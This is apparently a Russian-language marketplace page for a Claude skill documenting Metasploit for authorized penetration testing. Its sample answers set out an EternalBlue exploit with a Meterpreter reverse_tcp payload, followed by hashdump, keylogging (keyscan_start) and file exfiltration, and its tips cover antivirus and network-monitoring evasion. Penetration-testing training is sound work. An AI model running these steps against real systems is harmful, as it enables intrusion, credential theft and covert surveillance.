metasploit-framework
Мастер тестирования на проникновение с Metasploit и Claude
Специалистам по безопасности необходима экспертная поддержка для авторизованного тестирования на проникновение. Этот навык предоставляет исчерпывающую документацию по Metasploit Framework, охватывающую эксплуатацию уязвимостей, генерацию полезных нагрузок и действия после получения доступа с лучшими практиками соблюдения законодательства.
Скачать ZIP навыка
Загрузить в Claude
Перейдите в Settings → Capabilities → Skills → Upload skill
Включите и начните использовать
Протестировать
Использование «metasploit-framework». Как мне запустить msfconsole и искать эксплойты SMB?
Ожидаемый результат:
Для запуска msfconsole и поиска эксплойтов SMB: Запустите консоль командой 'msfconsole -q' для тихого режима, затем используйте 'search type:exploit smb' для поиска модулей эксплойтов, связанных с SMB. Также можно искать конкретно с 'search eternalblue' для эксплойта уязвимости MS17-010 SMB. Просмотрите детали модуля с 'info [module_name]' перед выбором.
Использование «metasploit-framework». Каковы шаги для конфигурации и запуска эксплойта с полезной нагрузкой meterpreter?
Ожидаемый результат:
Настройте эксплойт за шесть шагов: Сначала используйте 'use [module_path]' для выбора эксплойта. Выполните 'show options' для просмотра требуемых настроек. Установите параметры цели с 'set RHOSTS [target_ip]' и 'set RPORT [port]'. Выберите полезную нагрузку с 'set PAYLOAD windows/x64/meterpreter/reverse_tcp'. Настройте listener с 'set LHOST [your_ip]' и 'set LPORT [port]'. Наконец, выполните с 'exploit' для попытки компрометации и установления сессии Meterpreter.
Использование «metasploit-framework». Какие команды Meterpreter мне следует использовать после получения сессии?
Ожидаемый результат:
После установления сессии Meterpreter выполните 'sysinfo' и 'getuid' для понимания уровня доступа. Используйте 'hashdump' для извлечения хешей паролей и 'ps' для просмотра запущенных процессов. Выполните 'migrate [PID]' для перемещения в более стабильный процесс. Для эксфильтрации данных используйте 'download [file]' или 'upload [file]'. Выполните 'screenshot' для захвата рабочего стола или 'keyscan_start' для начала логирования нажатий клавиш. Фоновой командой 'background' вернитесь в msfconsole.
Аудит безопасности
Средний рискThis skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
Проблемы среднего риска (1)
Проблемы низкого риска (3)
Факторы риска
⚙️ Внешние команды (4)
🌐 Доступ к сети (3)
📁 Доступ к файловой системе (1)
Оценка качества
Что вы можете построить
Руководство по рабочему процессу тестирования на проникновение
Специалисты по безопасности используют этот навык во время авторизованных engagements по тестированию на проникновение для навигации по возможностям Metasploit Framework, выбора подходящих модулей эксплойтов, конфигурации полезных нагрузок и проведения действий после получения доступа в рамках legal scope.
Документация оценки безопасности
Участники Red team используют этот навык для документирования использования Metasploit в отчётах об оценке безопасности, обеспечивая точную запись правильного синтаксиса команд, выбора модулей и действий после получения доступа для клиентских deliverables.
Образовательный ресурс для обучения безопасности
Студенты в области кибербезопасности и кандидаты на сертификацию используют этот навык для изучения концепций Metasploit Framework, отработки рабочих процессов тестирования на проникновение в лабораторных средах и подготовки к сертификациям, таким как OSCP, CEH и PTX.
Попробуйте эти промпты
Как мне искать и выбрать подходящий модуль эксплойта Metasploit для Windows-цели с уязвимостями SMB?
Проведите меня через конфигурацию эксплойта eternalblue с полезной нагрузкой meterpreter reverse_tcp, включая установку RHOSTS, LHOST и требуемых опций.
После установления сессии Meterpreter, какие команды мне следует использовать для перечисления целевой системы, сбора учётных данных и поддержания постоянства доступа во время авторизованного тестирования на проникновение?
Сгенерируйте команду msfvenom для создания исполняемой полезной нагрузки Windows с обратным TCP-соединением, включая кодирование для обхода обнаружения антивирусом.
Лучшие практики
- Всегда получайте письменное разрешение перед проведением любых действий по тестированию на проникновение с Metasploit
- Сначала используйте команду 'check' для проверки уязвимости цели перед запуском эксплойтов для минимизации нарушений
- Тестируйте полезные нагрузки в изолированных лабораторных средах перед развёртыванием на производственных целях оценки
- Документируйте все команды, результаты и находки для включения в отчёты о тестировании на проникновение
- Используйте зашифрованные полезные нагрузки reverse_https вместо reverse_tcp, когда возможно, для обхода сетевого мониторинга
- Немедленно переводите сессии в фоновый режим и мигрируйте процессы для поддержания стабильности доступа
Избегать
- Не используйте эксплойты Metasploit на системах без явного письменного разрешения — это незаконно
- Избегайте последовательного запуска всех эксплойтов против целей без надлежащей разведки и проверки уязвимостей
- Никогда не используйте производственные системы или публичные IP-адреса в примерах команд во время документации или обучения
- Не оставляйте активные сессии Meterpreter без присмотра и не забывайте правильно закрывать их после оценок
- Избегайте использования некодированных полезных нагрузок, которые легко обнаруживаются антивирусом, без предварительного тестирования техник обхода
Часто задаваемые вопросы
Является ли использование Metasploit Framework законным?
В чём разница между msfconsole и msfvenom?
Почему мои эксплойты не работают или сессии немедленно завершаются?
Каковы различные типы полезных нагрузок в Metasploit?
Как обойти обнаружение антивирусом с полезными нагрузками Metasploit?
Может ли этот навык выполнять команды Metasploit напрямую через Claude или Claude Code?
Сведения для разработчиков
Автор
sickn33Лицензия
MIT
Репозиторий
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-frameworkСсылка
main
Структура файлов
📄 SKILL.md